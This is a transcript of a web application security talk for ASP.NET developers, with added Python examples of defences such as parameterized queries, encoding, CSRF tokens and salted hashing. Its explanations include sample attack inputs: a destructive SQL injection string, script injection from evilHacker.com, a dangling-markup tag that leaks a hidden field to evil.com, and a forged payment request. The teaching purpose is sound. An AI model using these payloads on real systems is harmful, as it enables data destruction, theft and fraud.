var title = "Web Security Threats and Solutions";
var info = {
name: "Ivelin Andreev",
otherOptional: "Security is not for granted"
};
Sofia, Nov 23, 2014
About me 
• Project Manager @ 
o 12 years professional experience 
o .NET Web Development MCPD 
o SQL Server 2012 (MCSA) 
• Business Interests 
o Web Development, SOA, Integration 
o Security & Performance Optimization 
o Horizon2020, Open BIM, GIS, Mapping 
• Contact me 
o ivelin.andreev@icb.bg 
o www.linkedin.com/in/ivelin 
o www.slideshare.net/ivoandreev
Web Security is Important 
Common misconceptions 
• I am using ASP.NET ?!?! 
• I am too small to be noticed by crackers 
• I am too busy for security, my brand is important 
• I am not operating in the financial industry 
• Security seal means nothing for customers 
• Hosting provider does not matter
agenda(); 
• SQL Injection 
• Cross-Site Scripting (XSS)
• Cross-Site Request Forgery (CSRF)
• Cross-Site Script Inclusion (XSSI)
• Parameter Tampering 
• Information Leakage 
• Distributed Denial of Service 
• Demo
SQL injection is so old... 
Don’t developers know any better?
SQL Injection 
Def: Commands or logic inserted in SQL data channel 
• Common Reasons 
o Dynamic query statements and string operations 
o Poor programming 
• Impact 
o Leak or loss of data 
o Authentication and authorization 
• Impact (you may not have considered)
o Damages limited only by the SQL account permissions 
o Windows authentication user rights can be exploited 
o Modify server security configuration 
o Install backdoors
(Pseudo) Solutions 
• Replace special symbols (-, ", ')
o Data with special symbols not searchable
o Poor routines can create a vulnerable query (e.g. -'- becomes the comment marker -- once the quote is stripped)
• Smuggling 
o Looks like a quote but not a quote - conversion on DB level 
o OWASP_IL_2007_SQL_Smuggling.pdf 
• NOSQL is not vulnerable 
o NOSQL is also vulnerable (e.g. MongoDB with JavaScript)
• Second order attacks 
o Validate request only 
o Data stored in the DB and later used in prepared queries
Using Parameters (in wrong manner)
• Dynamic queries (sp_executesql vs. EXEC)
o exec (@sqlString) – executes T-SQL string
o sp_executesql allows for statements to be parameterized
o sp_executesql is more secure in terms of SQL injection
• Developer believes dynamic SQL is the only option
CREATE PROCEDURE GetUsers @Sort nvarchar(50) AS
DECLARE @sql nvarchar(255)
SET @sql = 'SELECT UserName FROM Users ' + @Sort
-- still vulnerable: @Sort is concatenated into the text, not passed as a parameter
EXECUTE sp_executesql @sql
GO
o What if @Sort = '; DELETE FROM Users'
CREATE PROCEDURE GetUsers @Sort int AS
SELECT UserName FROM Users ORDER BY
CASE WHEN @Sort = 1 THEN (RANK() OVER (ORDER BY UserName ASC)) END
GO
Prevention & Mitigation 
• Parameterized queries and prepared statements 
o Use parameters where data are expected 
o ORMs use parameters (Nhibernate, Entity Framework) 
• “The least privilege” principle 
o Grant the minimum access rights 
o Parameterized queries vs. Stored Procedure permissions 
• Positive input validation (Poor) 
o Regular expressions / White lists (i.e. alphanumeric) 
• IIS Request Query Filtering (Poor) 
o filtering-for-sql-injection-on-iis-7-and-later 
• SQL injection and DB takeover 
o http://ha.ckers.org/sqlinjection/ 
o (SQL) http://sqlmap.org/; (NOSQL) http://www.nosqlmap.net/
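The two slides above contrast the dynamic-string GetUsers with the "@Sort int" version. The following is an added example, not code from the presentation, written in Python with sqlite3 standing in for SQL Server and the .NET data stack: a lookup that glues the search value into the SQL text next to the same lookup through the parameter channel, plus a sort option mapped onto a fixed server-side list, because identifiers such as ORDER BY columns cannot be bound as parameters. The table, the rows and the helper names are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed sample database for the example: three users, carol inactive."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Id INTEGER PRIMARY KEY, UserName TEXT, Active INTEGER)")
    conn.executemany("INSERT INTO Users (UserName, Active) VALUES (?, ?)",
                     [("alice", 1), ("bob", 1), ("carol", 0)])
    return conn


def find_active_user_vulnerable(conn, username):
    # Same mistake as the deck's GetUsers: the value is glued into the SQL text, so
    # a quote inside it ends the literal and whatever follows is parsed as SQL.
    sql = "SELECT UserName FROM Users WHERE Active = 1 AND UserName = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def find_active_user_safe(conn, username):
    # The value travels in the parameter channel; quotes inside it stay data.
    sql = "SELECT UserName FROM Users WHERE Active = 1 AND UserName = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


# Identifiers (column names, sort direction) cannot be bound as parameters, so the
# client chooses an integer key and the server maps it onto this fixed list. This is
# the deck's "@Sort int" + CASE idea written as a lookup table.
SORT_OPTIONS = {1: "UserName ASC", 2: "UserName DESC", 3: "Id ASC"}


def get_users_sorted(conn, sort):
    """Reject anything that is not one of the offered keys before it touches SQL."""
    if sort not in SORT_OPTIONS:
        raise ValueError("unknown sort option: %r" % (sort,))
    sql = "SELECT UserName FROM Users ORDER BY " + SORT_OPTIONS[sort]
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    with_quote = "carol' OR '1'='1"   # constructed input carrying an embedded quote
    print(find_active_user_vulnerable(db, with_quote))  # every user, the inactive one included
    print(find_active_user_safe(db, with_quote))        # [] - nobody has that literal name
    print(get_users_sorted(db, 2))
```

The vulnerable version returns all three rows for the quoted input because the WHERE clause has been rewritten; the parameterized version returns nothing because no user has that literal name. Note that input validation alone (the "Poor" items above) would not have helped with the sort parameter: what makes it safe is that the client never supplies SQL text at all.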
SQL Injection with Entity Framework
• Entity Framework Raw Queries
string query = "query" + "SQL injection code";
dbContext.Database.SqlQuery<string>(query).ToList();
o Security Considerations (Entity Framework)
• IQueryable
o Can result in untrusted calls
o If exposed from a library, can be cast to the underlying Context and connection
var orders = repository.GetOrders(5);
var context = ((ObjectQuery)orders).Context;
o Use IEnumerable instead
Cross Site Scripting (XSS) 
Def: Untrusted content displayed on page unencoded 
• Case 
o evilHacker injects <script> in http://goodSite.com application context 
• By posting HTML form field 
• By tricking user to click link with query parameters sent by mail 
%3Cscript%20src%3D%27evilHacker.com%2Fscript.js%27%3E 
• XSS Source 
o Query parameters, HTML form fields 
o HTML Attributes (onload, onblur) 
o URI requested and displayed in HTTP 404 page 
o Data from DB or file system 
o 3rd party data - RSS feeds or service
XSS – an Underestimated Threat 
• Create or access any DOM element 
• Hijack cookies, credentials or actions 
• Take control over victim machine 
Browser Exploitation Framework Project 
o Open source penetration testing tool 
o XSS vulnerability allows injection of BeEF 
o Victim browser is hooked 
o Perform actions/attacks on behalf of the victim 
o Exploit system in browser context
Persisted XSS 
• Attacker stores malicious data on server 
• Unvalidated data displayed on page w/o encoding 
• Store once – run many
Reflected XSS 
• Malicious client data is immediately used by server 
• Unvalidated data displayed on page w/o encoding 
• Requires social engineering 
o Convince users to follow a URL (via e-mail or forum comment) 
• Detection Tools 
o OWASP Xenotix XSS Exploit Framework 
o XSS-ME FireFox plugin
Client XSS & HTML Injection 
• DOM-based XSS 
o Malicious data executed as a part of DOM manipulation 
o Requires social engineering 
document.write("<OPTION value=1>" + document.location.href.substring(…) + "</OPTION>");
• Dangling Markup HTML injection
o Image source w/o closing tag
o On load of image – a request is made to attacker's site
<img src='http://evil.com/log.cgi?      ← Injected line with a non-terminated parameter
...
<input type="hidden" name="SecretField" value="12345">
...
'                                       ← Normally-occurring apostrophe somewhere in page text
o HTML leaks to evil site
All user input is evil
XSS Prevention & Mitigation 
• HTML escape then JavaScript escape 
• Encode on usage, not appearance 
o HttpUtility.HtmlEncode(string) 
o HttpUtility.JavaScriptStringEncode(string) 
o Microsoft Anti-Cross Site Scripting Library 
• Use proven sanitizers 
o Blacklist vs. Whitelist 
o Valid JavaScript can be created by poor filtering routine 
<SscriptCscriptRscriptIscriptPscriptTscript>… 
• Check 3rd party resources (i.e. jQuery plugins) 
• Analyze places where DOM elements are created 
o Use document.createElement() rather than $(obj).html()
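Added example, not code from the presentation: Python versions of the two encoders the slide names (HtmlEncode and JavaScriptStringEncode), the combined encoding for a value that lands in a JavaScript string inside an HTML attribute (both contexts, innermost first), and the blacklist filter the slide warns about, run over the <SscriptCscriptRscript...> input to show that stripping the word "script" produces a well-formed tag. The function names and sample inputs are constructed.

```python
import html
import json


def html_encode(value):
    """HTML text and attribute context: the job HttpUtility.HtmlEncode does in .NET."""
    return html.escape(value, quote=True)


def js_string_encode(value):
    """JavaScript string-literal context (cf. HttpUtility.JavaScriptStringEncode).

    json.dumps already escapes backslashes, double quotes and control characters;
    < > & ' are escaped as \\uXXXX as well, so the value can never close the
    enclosing <script> block or the quote, whichever quote style the template uses.
    """
    encoded = json.dumps(value)[1:-1]          # drop the surrounding double quotes
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"), ("'", "\\u0027")):
        encoded = encoded.replace(ch, esc)
    return encoded


def encode_for_js_in_attribute(value):
    """Value inside a JS string inside an HTML attribute, e.g. onclick="show('...')".

    The browser decodes the attribute as HTML first and parses the JavaScript
    second, so the encodings are applied in the opposite order: JavaScript
    encoding first, HTML encoding last. Encoding for only one context leaves a hole.
    """
    return html_encode(js_string_encode(value))


def naive_strip_script(value):
    """Blacklist filter of the kind the slide warns about: delete the word 'script'."""
    return value.replace("script", "")


if __name__ == "__main__":
    print(html_encode('<script>alert(1)</script>'))
    print(js_string_encode("</script><script>"))
    print(encode_for_js_in_attribute('"'))
    print(naive_strip_script("<SscriptCscriptRscriptIscriptPscriptTscript>"))   # <SCRIPT>
```

The last call is the slide's point about poor filtering: removing a forbidden word once leaves the letters around it, which reassemble into exactly the tag the filter tried to block. Encoding on output has no such failure mode because it never tries to decide what is "bad"; it only makes sure data cannot change context.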
Built-In XSS Prevention Features (.NET)
• Request Validation
o ASP.NET Web Forms: <%@ Page ValidateRequest="true" %>
o ASP.NET MVC: Controller.ValidateRequest = true;
o <httpRuntime requestValidationMode="4.0" />
• Do not turn off request validation 
o “Easy fix” for HTML editors 
o Use HTML editors that HTML encode before submission 
• Reliability 
o Microsoft advice: Relying solely on built-in request validation is not enough 
o No known vulnerabilities now (but not in the past) 
• AntiXss.HtmlEncode() vs. HttpUtility.HtmlEncode() 
o HttpUtility just ensures output does not break HTML 
o Performance penalty is +0.1 ms/transaction
Content Security Policy 
• HTTP Header 
o Content-Security-Policy: script-src 'self'
• Features 
o Whitelist sources of trusted content 
o Blocks resources from untrusted locations (incl. inline scripts) 
o Report of blocked resources 
• Directives 
o script-src; img-src; media-src; style-src; frame-src; connect-src 
• Keywords 
o 'none', 'self', 'unsafe-inline', 'unsafe-eval'
• Browser support 
o CanIUse.com CSP?
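To make the whitelist behaviour concrete, here is an added example (not browser code and not from the presentation) of how a policy such as the one on the slide is evaluated: parse the header into directives, fall back to default-src when a directive is absent, and decide whether a given resource would load. It is a simplified matcher that understands only 'none', 'self', 'unsafe-inline', * and host sources (with a leading *. wildcard); the policy string and URLs are constructed.

```python
from urllib.parse import urlsplit


def parse_csp(header):
    """'script-src 'self' https://cdn.example.com; img-src *' -> {directive: [sources]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def _origin(url):
    parts = urlsplit(url)
    return (parts.scheme.lower(), (parts.hostname or "").lower())


def _host_source_matches(source, resource_url):
    """host-source such as https://cdn.example.com or https://*.example.com."""
    scheme, _, rest = source.partition("://")
    if not rest:                                 # no scheme in the source expression
        scheme, rest = "", source
    host = rest.split("/")[0].split(":")[0].lower()
    res_scheme, res_host = _origin(resource_url)
    if scheme and scheme.lower() != res_scheme:
        return False
    if host.startswith("*."):
        return res_host.endswith(host[1:])       # "*.example.com" -> ".example.com"
    return host == res_host


def csp_allows(header, directive, page_url, resource_url=None):
    """Would a browser enforcing `header` load `resource_url` under `directive`?

    resource_url=None stands for an inline script or style block.
    """
    policy = parse_csp(header)
    sources = policy.get(directive, policy.get("default-src"))
    if sources is None:
        return True                              # nothing governs it: allowed
    if "'none'" in sources:
        return False
    if resource_url is None:
        return "'unsafe-inline'" in sources      # inline is blocked unless opted in
    for src in sources:
        if src == "*":
            return True
        if src == "'self'" and _origin(resource_url) == _origin(page_url):
            return True
        if not src.startswith("'") and _host_source_matches(src, resource_url):
            return True
    return False


if __name__ == "__main__":
    policy = "default-src 'self'; script-src 'self' https://cdn.example.com; img-src *"
    page = "https://goodsite.example/index.html"
    print(csp_allows(policy, "script-src", page, "https://evilhacker.example/script.js"))  # False
    print(csp_allows(policy, "script-src", page, None))                                   # False
    print(csp_allows(policy, "style-src", page, "https://goodsite.example/site.css"))      # True
```

Two details worth noticing: an injected <script src="https://evilhacker..."> is refused because no source matches, and so is any inline script, since the policy does not carry 'unsafe-inline'. That second point is why CSP also neutralises the reflected <script> payloads from the earlier slides, and why real deployments report blocked resources before enforcing.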
CSRF has nothing to do with sea-surf
Cross-Site Request Forgery (CSRF)
Def: Unauthorised commands transmitted from a user whom a website trusts
• Synonyms: One-click attack, Session riding
• Case
o User logs in http://goodSite.com as usual
o http://evilHacker.com can
• POST new password in form to GoodSite.com
• GET http://goodSite.com/Payment.aspx?amount=1000&userID=EvilHacker
o Authenticated because cookies are sent
• Impact
o EvilHacker.com cannot read DOM but can POST / GET
o Act on behalf of the user (i.e. payment)
o User access is blocked or stolen
Cross-Site Script Inclusion (XSSI)
• Case
o Exploits <script> element exception to Same Origin Policy
o http://goodSite.com includes own <script> for AJAX request
o http://evilHacker.com includes the same script
• Authenticated because cookies are sent
o Server returns JSON wrapped in function call
<script type="application/javascript"
src="http://goodSite.com/Svc/Get?callback=parseResponse"></script>
o SCRIPT evaluated in evilHacker.com context and JSON is stolen
parseResponse({"this": "is", "json": "data"});
• Impact
o User data are stolen
• Prevention
o Check policy of script inclusion
CSRF Prevention & Mitigation 
• NONCE token (URL, hidden field) 
o Checked upon submission 
o Protected by browser same origin policy 
• User defined (password, CAPTCHA) 
• Built-In (ASP.NET) 
Page.ViewStateUserKey = Session.SessionID;
o Signs the ViewState with unique user key 
• Built-In (ASP.NET MVC) 
o HtmlHelper.AntiForgeryToken() - generates a hidden form field 
o [ValidateAntiForgeryToken] attribute for controller validation 
o NOT a single-use token 
• POST(HTTP) makes attacks harder 
o Cross domain POSTs can be limited (CORS)
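The nonce-token defence from the slide, as an added example that is not code from the presentation and not the ASP.NET implementation: a per-session token generated from the CSPRNG, stored server side, emitted as a hidden field and compared in constant time on submission. It follows the MVC behaviour the slide notes (one reusable token per session rather than single-use). The session object, the form dictionaries and the change_password handler are constructed; the hidden-field name mirrors the one ASP.NET MVC's helper emits.

```python
import hmac
import secrets

TOKEN_FIELD = "__RequestVerificationToken"   # same field name ASP.NET MVC's helper emits


def issue_csrf_token(session):
    """Return the session's anti-forgery token, creating it on first use.

    One token per login session, reusable across forms: the AntiForgeryToken
    behaviour the slide describes as "NOT a single-use token".
    """
    token = session.get("csrf_token")
    if token is None:
        token = secrets.token_urlsafe(32)      # unguessable: 256 bits from the CSPRNG
        session["csrf_token"] = token
    return token


def hidden_token_field(session):
    """What goodSite.com embeds in its forms; evilHacker.com cannot read it (same-origin policy)."""
    return '<input type="hidden" name="%s" value="%s">' % (TOKEN_FIELD, issue_csrf_token(session))


def validate_csrf(session, form):
    """Check a POST body against the session; raise before any state changes."""
    expected = session.get("csrf_token")
    supplied = form.get(TOKEN_FIELD, "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        raise PermissionError("anti-forgery token missing or invalid")
    return True


def change_password(session, form):
    """Constructed handler: the token check runs first, then the protected action."""
    validate_csrf(session, form)
    session["password"] = form["new_password"]
    return "password changed"


if __name__ == "__main__":
    session = {}                                     # stand-in for server-side session state
    print(hidden_token_field(session))
    own_form = {TOKEN_FIELD: issue_csrf_token(session), "new_password": "s3cret"}
    print(change_password(session, own_form))        # password changed
    try:
        change_password(session, {"new_password": "owned"})   # cross-site form: no token
    except PermissionError as err:
        print("rejected:", err)
```

The cross-site form fails because the browser attaches the cookies (which is why the request is authenticated) but evilHacker.com has no way to learn the token. The CAPTCHA and re-enter-password options on the slide work for the same reason: they require something the forging page cannot supply.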
Parameter tampering
Parameter Tampering 
Def: Parameters changed in unintended way 
Common reasons 
• Query string; Hidden form fields; 
• Data-channel interception (M-i-t-M attack) 
Common Mistakes 
• Client side validation only 
• Mismatch with predefined set of values 
• Not validated access to entities on server (i.e. EntityId=???) 
• Unprotected data sent to client 
o Query strings; JavaScript parameters
Tampering Prevention & Mitigation
• Built-In (ASP.NET MVC) - None
• Built-In (ASP.NET)
• ViewState
o Not encrypted by default (Binary serialized, Base64 Encoded)
o Do not turn EnableViewStateMac off (Web Farm, X-domain POST)
• Event Validation
o "Invalid postback or callback argument…"
o Not encrypted (Binary serialized, Base64 Encoded)
o Do not turn event validation off
o Register for event validation
protected override void Render(HtmlTextWriter writer) {
…
Page.ClientScript.RegisterForEventValidation(ddl.UniqueID, "John");
}
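Added example, not code from the presentation and not the ASP.NET implementation, of the two mechanisms on the slide: a hidden-field value made tamper-evident with an HMAC (the role the ViewState MAC plays; note the value stays readable, as the slide says, it is only signed), and an event-validation allow-list that records which values a control offered and rejects a posted value the server never rendered. The secret, the control id and the values are constructed; in a real deployment the secret comes from configuration.

```python
import base64
import hashlib
import hmac

# Assumption for the example: a per-server secret loaded from configuration (the role
# <machineKey> plays for ViewState). Constructed value; never ship a literal like this.
SERVER_SECRET = b"constructed-example-secret-do-not-reuse"


def sign_field(value, secret=SERVER_SECRET):
    """Make a hidden-field value tamper-evident: value.<base64url HMAC-SHA256>.

    Signing is not encryption: the client can still read the value (as with
    ViewState), but any change made in the browser or in transit is detected.
    """
    mac = hmac.new(secret, value.encode("utf-8"), hashlib.sha256).digest()
    return value + "." + base64.urlsafe_b64encode(mac).decode("ascii").rstrip("=")


def verify_field(signed, secret=SERVER_SECRET):
    """Return the original value, or raise if the MAC does not match."""
    value, sep, _mac = signed.rpartition(".")      # the MAC itself never contains '.'
    expected = sign_field(value, secret).encode("utf-8")
    if not sep or not hmac.compare_digest(expected, signed.encode("utf-8")):
        raise ValueError("Invalid postback or callback argument")   # the slide's message
    return value


def register_for_event_validation(registry, control_id, value):
    """Server-side allow-list of what a control may post back (RegisterForEventValidation)."""
    registry.setdefault(control_id, set()).add(value)


def validate_postback(registry, control_id, posted):
    """Reject values the server never offered, e.g. an <option> added in the browser."""
    if posted not in registry.get(control_id, ()):
        raise ValueError("Invalid postback or callback argument")
    return posted


if __name__ == "__main__":
    signed = sign_field("12345")                     # e.g. the SecretField from the XSS slide
    print(signed)
    print(verify_field(signed))                      # 12345
    mac = signed.split(".", 1)[1]
    try:
        verify_field("99999." + mac)                 # value changed, MAC kept
    except ValueError as err:
        print("rejected:", err)
    registry = {}
    register_for_event_validation(registry, "ddl", "John")
    print(validate_postback(registry, "ddl", "John"))
```

Both checks close the "client side validation only" gap from the previous slide: the hidden amount, id or price either comes back exactly as rendered or the request is refused, and a dropdown can only post values the server put in it. The slide's reminder to keep EnableViewStateMac on is the same idea applied to the whole ViewState blob.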
Encryption & Hashing
Encryption 
• Protects sensitive data (if stolen) 
o Credentials; Auth tokens; Configuration; 
• SQL data encryption 
o EncryptByPassPhrase 
o EncryptByCert 
o EncryptByKey 
• Application level 
o AesCryptoServiceProvider, RijndaelManaged
o TripleDESCryptoServiceProvider 
• Connection string encryption 
o Machine specific encryption after deploy 
aspnet_regiis -pe "connectionStrings" -app /[appname]
o Decryption done automatically
Hashing 
• Irreversible function (MD5, SHA1, SHA256) 
o MD5 generator: http://www.md5.cz/ 
o Smaller than the data 
• Collisions allowed 
• Usage 
o Assure information was not changed (tampered) 
o Protect passwords 
• Compromising 
o Good algorithm is always compromised by weak passwords 
o Brute force (GPU) 
o Precalculated “Rainbow tables” (Dictionary attack) 
• http://www.hashkiller.co.uk/md5-decrypter.aspx
Protecting Hashes 
• Random Salt 
o [SecretText][Salt] -> [Hash] 
o Changes hash value 
o Invalidates rainbow tables 
o Slows down brute force attacks 
• Complex passwords 
• Slow algorithms 
• Key stretching (Rfc2898DeriveBytes class) 
U1 = PRF(Password, Salt)
U2 = PRF(Password, U1)
...
Uc = PRF(Password, U(c-1))
• Outsource sensitive data storage (if possible)
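The key-stretching chain on the slide written out, as an added example that is not code from the presentation: the U1..Uc iteration of PBKDF2 (RFC 2898, the algorithm behind the Rfc2898DeriveBytes class) computed by hand for one output block and cross-checked against the standard library, followed by a store-and-verify pair that combines a random per-user salt with a slow iteration count. Python's hashlib and hmac are used in place of the .NET classes; the passwords and iteration counts are constructed.

```python
import hashlib
import hmac
import os
import struct


def pbkdf2_one_block(password, salt, iterations, hash_name="sha256"):
    """The U1..Uc chain from the slide, for one output block of PBKDF2 (RFC 2898).

    U1 = PRF(Password, Salt || INT(1)), Ui = PRF(Password, U(i-1)), and the block is
    U1 xor U2 xor ... xor Uc. Every step depends on the previous one, so the work
    cannot be skipped or parallelised per guess; c is the knob that makes it slow.
    """
    def prf(key, msg):
        return hmac.new(key, msg, hash_name).digest()

    u = prf(password, salt + struct.pack(">I", 1))   # U1; block index 1 is appended to the salt
    t = u
    for _ in range(iterations - 1):
        u = prf(password, u)                          # Ui = PRF(Password, U(i-1))
        t = bytes(a ^ b for a, b in zip(t, u))        # running xor of all Ui
    return t


def matches_stdlib(password, salt, iterations):
    """Cross-check the hand-written chain against hashlib.pbkdf2_hmac (same single block)."""
    reference = hashlib.pbkdf2_hmac("sha256", password, salt, iterations)
    return pbkdf2_one_block(password, salt, iterations) == reference


def hash_password(password, iterations=100_000):
    """Random per-user salt + slow KDF; the stored string carries everything needed to verify.

    The salt is what invalidates rainbow tables: the same password gives a
    different hash for every user and every enrolment.
    """
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


if __name__ == "__main__":
    print(matches_stdlib(b"password", b"salt", 4096))        # True
    stored = hash_password("correct horse battery staple")
    print(stored)
    print(verify_password("correct horse battery staple", stored))   # True
    print(verify_password("Tr0ub4dor&3", stored))                    # False
```

The iteration count is the "slow algorithm" item on the slide and should be tuned upwards over time as hardware gets faster; because it is stored alongside the hash, old entries keep verifying and can be re-hashed at the user's next login. None of this rescues a weak password, which is the slide's last warning: stretching multiplies the attacker's cost per guess, it does not reduce the number of guesses a short dictionary word needs.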
Information Leakage 
• Loss of sensitive data 
o Display trace and log information 
o Display raw error messages 
o Google it: inurl: elmah.axd aspxauth 
o Attacker can profile application and select appropriate attack 
• Mitigation 
o Custom error pages <customErrors mode="On" defaultRedirect="Error.aspx" />
o Turn off tracing 
• Retail mode <deployment retail="true" />
o Set in machine.config for the whole server 
o Sets Custom Errors = “on”, Debug = “false” 
o Trace information is not displayed 
• Test
Transport Layer Security
SSL / TLS 
• HTTP over SSL prevents packet sniffing 
• Force SSL for the entire site 
o Or at least for credentials interchange 
• ASP.NET MVC: RequireHttpsAttribute 
o Redirects Request to HTTPS scheme 
• ASP.NET Web Forms 
o Requires custom code 
o https://code.google.com/p/securityswitch/ 
<securitySwitch mode="RemoteOnly"> 
<paths> 
<add path="~/Login.aspx" /> 
</paths> 
</securitySwitch>
Distributed Denial of Service
Denial of Service Attack 
DDoS 
• Anonymous?! 
o LOIC (Hive mode) 
o TOR Anonymity Project 
• Hash DoS (since 2003) 
o POST params in hash table (with collisions) 
o Too many hashes = 100% CPU 
o Patch: Block POST of >1000 form fields 
Prevention & Mitigation 
• Dynamic IP restrictions IIS extension 
o http://www.iis.net/downloads/microsoft/dynamic-ip-restrictions 
• Good logging and diagnostics is essential
Demo
Takeaways 
• Guidelines & Code Labs 
o Open Web Application Security Project www.owasp.org 
o Web App Exploits and Defenses google-gruyere 
o 2013 Top 10 Web Security Vulnerabilities Top_10_2013 
o 2011 Top 25 Most Dangerous Software Errors cwe.mitre.org/top25 
• Articles 
o Hack-proofing ASP.NET Web Applications Adam Tuliper 
o Hash DDoS Hash-Dos-Attack 
• .NET Source Code referencesource.microsoft.com 
• Tools 
o ASafaWeb Analyser asafaweb.com 
o Website and Web Server Security Testing www.beyondsecurity.com
Upcoming events 
ISTA Conference 26-27 November 
http://istabg.org/ 
Stay tuned for 2015: 
Azure Bootcamp http://azure-camp.eu/ 
UXify Bulgaria http://uxify.org/ 
SQLSaturday https://www.sqlsaturday.com/ 
and more js.next();
 
Forecasting time series powerful and simple
Forecasting time series powerful and simpleForecasting time series powerful and simple
Forecasting time series powerful and simple
Ivo Andreev
 
Constrained Optimization with Genetic Algorithms and Project Bonsai
Constrained Optimization with Genetic Algorithms and Project BonsaiConstrained Optimization with Genetic Algorithms and Project Bonsai
Constrained Optimization with Genetic Algorithms and Project Bonsai
Ivo Andreev
 
Azure security guidelines for developers
Azure security guidelines for developers Azure security guidelines for developers
Azure security guidelines for developers
Ivo Andreev
 
Autonomous Machines with Project Bonsai
Autonomous Machines with Project BonsaiAutonomous Machines with Project Bonsai
Autonomous Machines with Project Bonsai
Ivo Andreev
 
Global azure virtual 2021 - Azure Lighthouse
Global azure virtual 2021 - Azure LighthouseGlobal azure virtual 2021 - Azure Lighthouse
Global azure virtual 2021 - Azure Lighthouse
Ivo Andreev
 
Flux QL - Nexgen Management of Time Series Inspired by JS
Flux QL - Nexgen Management of Time Series Inspired by JSFlux QL - Nexgen Management of Time Series Inspired by JS
Flux QL - Nexgen Management of Time Series Inspired by JS
Ivo Andreev
 
Azure architecture design patterns - proven solutions to common challenges
Azure architecture design patterns - proven solutions to common challengesAzure architecture design patterns - proven solutions to common challenges
Azure architecture design patterns - proven solutions to common challenges
Ivo Andreev
 
Industrial IoT on Azure
Industrial IoT on AzureIndustrial IoT on Azure
Industrial IoT on Azure
Ivo Andreev
 
The Power of Auto ML and How Does it Work
The Power of Auto ML and How Does it WorkThe Power of Auto ML and How Does it Work
The Power of Auto ML and How Does it Work
Ivo Andreev
 

More from Ivo Andreev (20)

Cybersecurity and Generative AI - for Good and Bad vol.2
Cybersecurity and Generative AI - for Good and Bad vol.2Cybersecurity and Generative AI - for Good and Bad vol.2
Cybersecurity and Generative AI - for Good and Bad vol.2
 
Architecting AI Solutions in Azure for Business
Architecting AI Solutions in Azure for BusinessArchitecting AI Solutions in Azure for Business
Architecting AI Solutions in Azure for Business
 
Cybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadCybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and Bad
 
JS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AIJS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AI
 
How do OpenAI GPT Models Work - Misconceptions and Tips for Developers
How do OpenAI GPT Models Work - Misconceptions and Tips for DevelopersHow do OpenAI GPT Models Work - Misconceptions and Tips for Developers
How do OpenAI GPT Models Work - Misconceptions and Tips for Developers
 
OpenAI GPT in Depth - Questions and Misconceptions
OpenAI GPT in Depth - Questions and MisconceptionsOpenAI GPT in Depth - Questions and Misconceptions
OpenAI GPT in Depth - Questions and Misconceptions
 
Cutting Edge Computer Vision for Everyone
Cutting Edge Computer Vision for EveryoneCutting Edge Computer Vision for Everyone
Cutting Edge Computer Vision for Everyone
 
Collecting and Analysing Spaceborn Data
Collecting and Analysing Spaceborn DataCollecting and Analysing Spaceborn Data
Collecting and Analysing Spaceborn Data
 
Collecting and Analysing Satellite Data with Azure Orbital
Collecting and Analysing Satellite Data with Azure OrbitalCollecting and Analysing Satellite Data with Azure Orbital
Collecting and Analysing Satellite Data with Azure Orbital
 
Language Studio and Custom Models
Language Studio and Custom ModelsLanguage Studio and Custom Models
Language Studio and Custom Models
 
CosmosDB for IoT Scenarios
CosmosDB for IoT ScenariosCosmosDB for IoT Scenarios
CosmosDB for IoT Scenarios
 
Forecasting time series powerful and simple
Forecasting time series powerful and simpleForecasting time series powerful and simple
Forecasting time series powerful and simple
 
Constrained Optimization with Genetic Algorithms and Project Bonsai
Constrained Optimization with Genetic Algorithms and Project BonsaiConstrained Optimization with Genetic Algorithms and Project Bonsai
Constrained Optimization with Genetic Algorithms and Project Bonsai
 
Azure security guidelines for developers
Azure security guidelines for developers Azure security guidelines for developers
Azure security guidelines for developers
 
Autonomous Machines with Project Bonsai
Autonomous Machines with Project BonsaiAutonomous Machines with Project Bonsai
Autonomous Machines with Project Bonsai
 
Global azure virtual 2021 - Azure Lighthouse
Global azure virtual 2021 - Azure LighthouseGlobal azure virtual 2021 - Azure Lighthouse
Global azure virtual 2021 - Azure Lighthouse
 
Flux QL - Nexgen Management of Time Series Inspired by JS
Flux QL - Nexgen Management of Time Series Inspired by JSFlux QL - Nexgen Management of Time Series Inspired by JS
Flux QL - Nexgen Management of Time Series Inspired by JS
 
Azure architecture design patterns - proven solutions to common challenges
Azure architecture design patterns - proven solutions to common challengesAzure architecture design patterns - proven solutions to common challenges
Azure architecture design patterns - proven solutions to common challenges
 
Industrial IoT on Azure
Industrial IoT on AzureIndustrial IoT on Azure
Industrial IoT on Azure
 
The Power of Auto ML and How Does it Work
The Power of Auto ML and How Does it WorkThe Power of Auto ML and How Does it Work
The Power of Auto ML and How Does it Work
 

Recently uploaded

Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Hivelance Technology
 
Explore Modern SharePoint Templates for 2024
Explore Modern SharePoint Templates for 2024Explore Modern SharePoint Templates for 2024
Explore Modern SharePoint Templates for 2024
Sharepoint Designs
 
